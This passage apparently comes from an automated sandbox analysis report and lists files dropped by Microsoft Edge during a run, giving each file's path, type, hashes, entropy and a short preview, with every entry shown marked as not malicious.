SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Sdch Dictionaries (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.1275671571169275
Encrypted:	false
SSDEEP:	3:Y2ktGMxkAXWMSN:Y2xFMSN
MD5:	20D4B8FA017A12A108C87F540836E250
SHA1:	1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
SHA-256:	6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
SHA-512:	507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
Malicious:	false
Preview:	{"SDCH":{"dictionaries":{},"version":2}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Sdch Dictionaries~RF46742.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.1275671571169275
Encrypted:	false
SSDEEP:	3:Y2ktGMxkAXWMSN:Y2xFMSN
MD5:	20D4B8FA017A12A108C87F540836E250
SHA1:	1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
SHA-256:	6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
SHA-512:	507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
Malicious:	false
Preview:	{"SDCH":{"dictionaries":{},"version":2}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Trust Tokens

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 9, cookie 0x7, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	36864
Entropy (8bit):	0.3886039372934488
Encrypted:	false
SSDEEP:	24:TLqEeWOT/kIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:T2EeWOT/nDtX5nDOvyKDhU1cSB
MD5:	DEA619BA33775B1BAEEC7B32110CB3BD
SHA1:	949B8246021D004B2E772742D34B2FC8863E1AAA
SHA-256:	3669D76771207A121594B439280A67E3A6B1CBAE8CE67A42C8312D33BA18854B
SHA-512:	7B9741E0339B30D73FACD4670A9898147BE62B8F063A59736AFDDC83D3F03B61349828F2AE88F682D42C177AE37E18349FD41654AEBA50DDF10CD6DC70FA5879
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...}.....$.X..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\bf665e7c-e3cf-47b8-9fd4-0fff5d8a75c2.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\d4aad656-7d3c-4284-bd9c-eb91cf1a42e9.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\dfafc736-7d44-4715-9a37-33cd3953e382.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.1275671571169275
Encrypted:	false
SSDEEP:	3:Y2ktGMxkAXWMSN:Y2xFMSN
MD5:	20D4B8FA017A12A108C87F540836E250
SHA1:	1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
SHA-256:	6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
SHA-512:	507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
Malicious:	false
Preview:	{"SDCH":{"dictionaries":{},"version":2}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\ed0d3cb4-37fe-446d-b1e4-9147ef80b977.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\f557c39d-7141-4cee-8dc9-f9aac5c0a901.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	144
Entropy (8bit):	4.842082263530856
Encrypted:	false
SSDEEP:	3:YLb9N+eAXRfHDH2LS7PMVKJq0nMb1KKtiBn1KKyRY:YHpoeS7PMVKJTnMRK3B1KF+
MD5:	F32592F4926E25E0D647EA7E4CBCD3FE
SHA1:	4126DAA71810BDC438563699F77D5DA66DD3295E
SHA-256:	BB0A228D78AE9A4E3508B13B041710AAA7E658AAA526FA553719851EB4F2303A
SHA-512:	96F9B027B0E7E44E14006EAC6DE05A6CF684F5D6427004737CC379DC02875FA1D65C422AB6CA0EF89C0555ACD12B1D99F552894F15EE9EAF1A203FE58835A35D
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G","CAYSABiAgICA+P////8B":"Offline"}}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	80
Entropy (8bit):	3.4921535629071894
Encrypted:	false
SSDEEP:	3:S8ltHlS+QUl1ASEGhTFljl:S85aEFljl
MD5:	69449520FD9C139C534E2970342C6BD8
SHA1:	230FE369A09DEF748F8CC23AD70FD19ED8D1B885
SHA-256:	3F2E9648DFDB2DDB8E9D607E8802FEF05AFA447E17733DD3FD6D933E7CA49277
SHA-512:	EA34C39AEA13B281A6067DE20AD0CDA84135E70C97DB3CDD59E25E6536B19F7781E5FC0CA4A11C3618D43FC3BD3FBC120DD5C1C47821A248B8AD351F9F4E6367
Malicious:	false
Preview:	*...#................version.1..namespace-..&f.................&f...............

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	422
Entropy (8bit):	5.209816806611339
Encrypted:	false
SSDEEP:	12:+h4v4YebvqBZFUt8ZzzJ/+ZVND5LYebvqBaJ:+I4Yebvyg8Zz0VXLYebvL
MD5:	0EE08F4DC617DFD74F315ACF30C99B29
SHA1:	24D6520BD787EA91CC045604B52C025886AA8C5F
SHA-256:	32025596BB7AF074296E91C5ADD4849456EC3809083FEEF9812C4347BF6FA7A5
SHA-512:	E196AAF23175DF693038925D697F36554F2D7A0F95BB11948E99F128F8F33037BB1305608443505B4F43A0DDFCBDCFBE5ECCAE902F0AA554552D2BBD914B8201
Malicious:	false
Preview:	2024/11/11-04:33:32.625 13b4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/11/11-04:33:32.627 13b4 Recovering log #3.2024/11/11-04:33:32.630 13b4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	422
Entropy (8bit):	5.209816806611339
Encrypted:	false
SSDEEP:	12:+h4v4YebvqBZFUt8ZzzJ/+ZVND5LYebvqBaJ:+I4Yebvyg8Zz0VXLYebvL
MD5:	0EE08F4DC617DFD74F315ACF30C99B29
SHA1:	24D6520BD787EA91CC045604B52C025886AA8C5F
SHA-256:	32025596BB7AF074296E91C5ADD4849456EC3809083FEEF9812C4347BF6FA7A5
SHA-512:	E196AAF23175DF693038925D697F36554F2D7A0F95BB11948E99F128F8F33037BB1305608443505B4F43A0DDFCBDCFBE5ECCAE902F0AA554552D2BBD914B8201
Malicious:	false
Preview:	2024/11/11-04:33:32.625 13b4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/11/11-04:33:32.627 13b4 Recovering log #3.2024/11/11-04:33:32.630 13b4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	328
Entropy (8bit):	5.108880291851824
Encrypted:	false
SSDEEP:	6:HUzLHyq2P923oH+TcwtpIFUt8YUzLQP1Zmw+YUzLQZRkwO923oH+Tcwta/WLJ:+Gv4YebmFUt8ZkP1/+Zk/5LYebaUJ
MD5:	D35B2AAE422C15934AF4B571B0E9039C
SHA1:	A21C647C323ED5BE1795600920E05BC755BEB410
SHA-256:	EE9882A4813CBF96F9EDD331CF7332439CAE94C402779824DA602A68D4952C56
SHA-512:	D899C68388F69C1AE5BA12BFCF5B68FDD630BD10C30FB83C4465F01DE69CCF188F7E3E1D4DC61E350A68EBAEC6F930987A4B59FFF1AEB97FB3CEE325E0B23CE8
Malicious:	false
Preview:	2024/11/11-04:33:15.013 1dc0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/11/11-04:33:15.014 1dc0 Recovering log #3.2024/11/11-04:33:15.014 1dc0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	328
Entropy (8bit):	5.108880291851824
Encrypted:	false
SSDEEP:	6:HUzLHyq2P923oH+TcwtpIFUt8YUzLQP1Zmw+YUzLQZRkwO923oH+Tcwta/WLJ:+Gv4YebmFUt8ZkP1/+Zk/5LYebaUJ
MD5:	D35B2AAE422C15934AF4B571B0E9039C
SHA1:	A21C647C323ED5BE1795600920E05BC755BEB410
SHA-256:	EE9882A4813CBF96F9EDD331CF7332439CAE94C402779824DA602A68D4952C56
SHA-512:	D899C68388F69C1AE5BA12BFCF5B68FDD630BD10C30FB83C4465F01DE69CCF188F7E3E1D4DC61E350A68EBAEC6F930987A4B59FFF1AEB97FB3CEE325E0B23CE8
Malicious:	false
Preview:	2024/11/11-04:33:15.013 1dc0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/11/11-04:33:15.014 1dc0 Recovering log #3.2024/11/11-04:33:15.014 1dc0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 10, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 10
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.265079564165095
Encrypted:	false
SSDEEP:	384:8/2qOB1nxCkMNSAELyKOMq+8yC8F/YfU5m+OlTLVume:Bq+n0JN9ELyKOMq+8y9/OwF
MD5:	F002D56A8943FD58154C6A16C483FF6D
SHA1:	DF276B713CFD350453C5079E37FB3F145658A427
SHA-256:	C8F3D3E5440FFA2216E68FBF08CB9E13905402F9321EA3D9CDB1CAE24E0E64D4
SHA-512:	B46C79180D7383A03AECFF23D7DA3E682F38E8E701B382D769798D3C0EFBEEE32B691774ECE7FDDF08DCC2011056C86C5DED4F4C2B1932B7412BED2B40639D4C
Malicious:	false
Preview:	SQLite format 3......@ .......[...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\WebStorage\QuotaManager

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 10, cookie 0x7, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.46672491447180076
Encrypted:	false
SSDEEP:	48:Tnj7dojKsKmjKZKAsjZNOjAhts3N8g1j3UcB0QyjS:v7doKsKuKZKlZNmu46yjx00
MD5:	3870EE5DE920ECE6247CA09B904B3BC2
SHA1:	0AD6FB0F9F37B1AF7877D8389A1C0704DC349491
SHA-256:	33645DECEEF55214DA209EB1B969D82FF6252CB85C5317080237F62664858F4D
SHA-512:	B41229E3D66C79B1B65C7C0947A8A92181A62A490FE01B57B290817F8EF79728D6EFAE76DDF559DAB156C88347E5F10B703BB17E87F40BE726A8FBF1398672E8
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.......w..g...........M...w..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\aa1c980c-25ce-49e4-9817-8540e17245c6.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Unicode text, UTF-8 text, with very long lines (14063), with no line terminators
Category:	dropped
Size (bytes):	14065
Entropy (8bit):	5.420852236169281
Encrypted:	false
SSDEEP:	384:stWQrsMiqfhu2sW9cLpbGM4Qwb6WYdaTY4:scciqfs89c1bGMHIkdaTY4
MD5:	D4C812B5E0FA2BC4A591964AA97F7076
SHA1:	B9F0AD089A9547440042453530B5698ED1CCDB28
SHA-256:	39562202AB27BF20C8A4A38E2BACCD55D9854BE1F25173E2A27FDB7F2E2AE50A
SHA-512:	14261667A5DB366BAF5C07EA650475C8C9C866BAED79852C60D390C682BEA47A3960DF5F4500B4D089683495D81E6CBCB66E832C3D7E8D107C28B0A9199B4369
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13375791195543194","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"l

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\arbitration_service_config.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with very long lines (3951), with CRLF line terminators
Category:	dropped
Size (bytes):	11755
Entropy (8bit):	5.190465908239046
Encrypted:	false
SSDEEP:	192:hH4vrmqRBB4W4PoiUDNaxvR5FCHFcoaSbqGEDI:hH4vrmUB6W4jR3GaSbqGEDI
MD5:	07301A857C41B5854E6F84CA00B81EA0
SHA1:	7441FC1018508FF4F3DBAA139A21634C08ED979C
SHA-256:	2343C541E095E1D5F202E8D2A0807113E69E1969AF8E15E3644C51DB0BF33FBF
SHA-512:	00ADE38E9D2F07C64648202F1D5F18A2DFB2781C0517EAEBCD567D8A77DBB7CB40A58B7C7D4EC03336A63A20D2E11DD64448F020C6FF72F06CA870AA2B4765E0
Malicious:	false
Preview:	{.. "DefaultCohort": {.. "21f3388b-c2a5-4791-8f6e-a4cad6d17f4f.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.BingHomePage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Covid.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Finance.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Jobs.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.KnowledgeCard.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Local.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NTP3PCLICK.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NotifySearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Recipe.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.SearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Sports.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Travel.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Weather.Bubble": 1,.. "2cb2db96-3bd0-403e-abe2-9269b3761041.Bubble": 1,.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\b8b91d43-f5e6-4c5c-aa2d-d598f67ca610.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with very long lines (1597), with CRLF line terminators
Category:	dropped
Size (bytes):	115717
Entropy (8bit):	5.183660917461099
Encrypted:	false
SSDEEP:	1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
MD5:	3D8183370B5E2A9D11D43EBEF474B305
SHA1:	155AB0A46E019E834FA556F3D818399BFF02162B
SHA-256:	6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
SHA-512:	B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
Malicious:	false
Preview:	{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs\|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs\|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\bb7d5e1b-0b67-4eef-a09b-5b2396aa8199.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	40504
Entropy (8bit):	5.561410883500817
Encrypted:	false
SSDEEP:	768:b49+qW7pLGLpz1WP4+fjt8F1+UoAYDCx9Tuqh0VfUC9xbog/OVQvrMn7srwSyKcY:b49+q2cpz1WP4+fjtu1japvrE7FSyKcY
MD5:	29F20647A50F6AE8ED870E589164F596
SHA1:	72F887D5C97241BD3F0ECB5CFA6C347E62F7A1E0
SHA-256:	742423A369650855C2DDE5BCBA1DFD5F184D06AB748E0979F8B95F89A501FDA0
SHA-512:	43F12FB9A55117982434186C19DBC411016CCE361F8592544A92EE5E89A937D7FEE9937EC468516AD2A2344F3A9EFBC3B812BDADEA7AB5C15FB20749716640B8
Malicious:	false
Preview:	{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13375791195057337","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13375791195057337","location":5,"ma

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\databases\Databases.db

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x4, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	0.3410017321959524
Encrypted:	false
SSDEEP:	12:TLiqi/nGb0EiDFIlTSFbyrKZb9YwFOqAyl+FxOUwa5qgufTJpbZ75fOSG:TLiMNiD+lZk/Fj+6UwccNp15fBG
MD5:	98643AF1CA5C0FE03CE8C687189CE56B
SHA1:	ECADBA79A364D72354C658FD6EA3D5CF938F686B
SHA-256:	4DC3BF7A36AB5DA80C0995FAF61ED0F96C4DE572F2D6FF9F120F9BC44B69E444
SHA-512:	68B69FCE8EF5AB1DDA2994BA4DB111136BD441BC3EFC0251F57DC20A3095B8420669E646E2347EAB7BAF30CACA4BCF74BD88E049378D8DE57DE72E4B8A5FF74B
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g.....P....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\e5d6971b-84ce-4ffd-b245-6a3023a8c748.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:L:L
MD5:	5058F1AF8388633F609CADB75A75DC9D
SHA1:	3A52CE780950D4D969792A2559CD519D7EE8C727
SHA-256:	CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
SHA-512:	0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
Malicious:	false
Preview:	.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-shm

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.10606022299178282
Encrypted:	false
SSDEEP:	12:JntBlJntBlcpEjVl/PnnnnnnnnnnnnvoQhEoZ:Jnt5ntYoPnnnnnnnnnnnnvLj
MD5:	1D296C6B460E19069DA565D85F604EB0
SHA1:	077DF391FF3ADF13D57179343B89C68B1E80993B
SHA-256:	B2429279BB179C980FB7C2F31A3D2A2DD43F74C58994732CF234A822B498DD4F
SHA-512:	1CA1EA27656742F9C33058CE69044D6DC2AB767C590CE1168CF47CCBC75ABC2BA8EC44D1C1D25A02DB2E30643F71E97CE8B328D50839C394471A0AC642D6ECC6
Malicious:	false
Preview:	..-.............Q.......[-.V.7.&.4..}..U..l.....-.............Q.......[-.V.7.&.4..}..U..l...........M...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-wal

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite Write-Ahead Log, version 3007000
Category:	dropped
Size (bytes):	333752
Entropy (8bit):	0.9348222147506038
Encrypted:	false
SSDEEP:	384:G2PR/pBGxDWqs69+2IdGk1kc+0WMx1KDv89ygyJZyGyDsytxywYK3v8M:r1n
MD5:	03C948F731180A13AD30CB46D4D69E05
SHA1:	21F358EEF2682D49A70606E61247BF2C31965B0B
SHA-256:	1073541ABA28122EED7BD352AC0EEBED887BED38EAC01673F39CE2B8945C6648
SHA-512:	E8CFEAD0F7794C02D6A638B4131BC8E5EC0934A3DB720E911481F83DF2D600F00AA4F909D760E70721FE134CA51D305497F7407B45C38FA873312E579520980C
Malicious:	false
Preview:	7....-...........4..}...8.?L.0.........4..}........C.SQLite format 3......@ ..........................................................................j.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	694
Entropy (8bit):	3.583147670725948
Encrypted:	false
SSDEEP:	12:Wlc8NOuuuuuuuuuuuuuuuuuuuu6llvX7U8M:iD7l/i
MD5:	97E2E9D712605E6FC9F3414DA0917CBE
SHA1:	E47BB537D56D606FEEEA980A3B8C84672E121579
SHA-256:	6C668A1B2976C2D181D6CE234764A4C07D0FA9B01E822915F7F4F2D1B32FF598
SHA-512:	A1B57B06F03A6B30D077B3F9A1F830C5179EFC17F3EE2453DE70D4FF4471118058B30153849C40B8E978FF658803237546D30CBEC6A9666B073A1BB995FC0008
Malicious:	false
Preview:	A..r.................20_1_1...1.,U.................20_1_1...1..}0................39_config..........6.....n ....1u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............D.l.;...............#38_h.......6.Z..W.F.....B`d.....B`d.........V.e................V.e................V.e..................U@0................39_config..........6.....n ...1

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	324
Entropy (8bit):	5.206091313150845
Encrypted:	false
